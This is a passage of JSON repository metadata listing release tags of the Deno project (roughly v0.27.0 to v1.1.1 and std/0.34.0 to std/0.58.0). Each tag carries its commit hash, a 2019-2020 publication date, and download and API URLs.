ithub/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re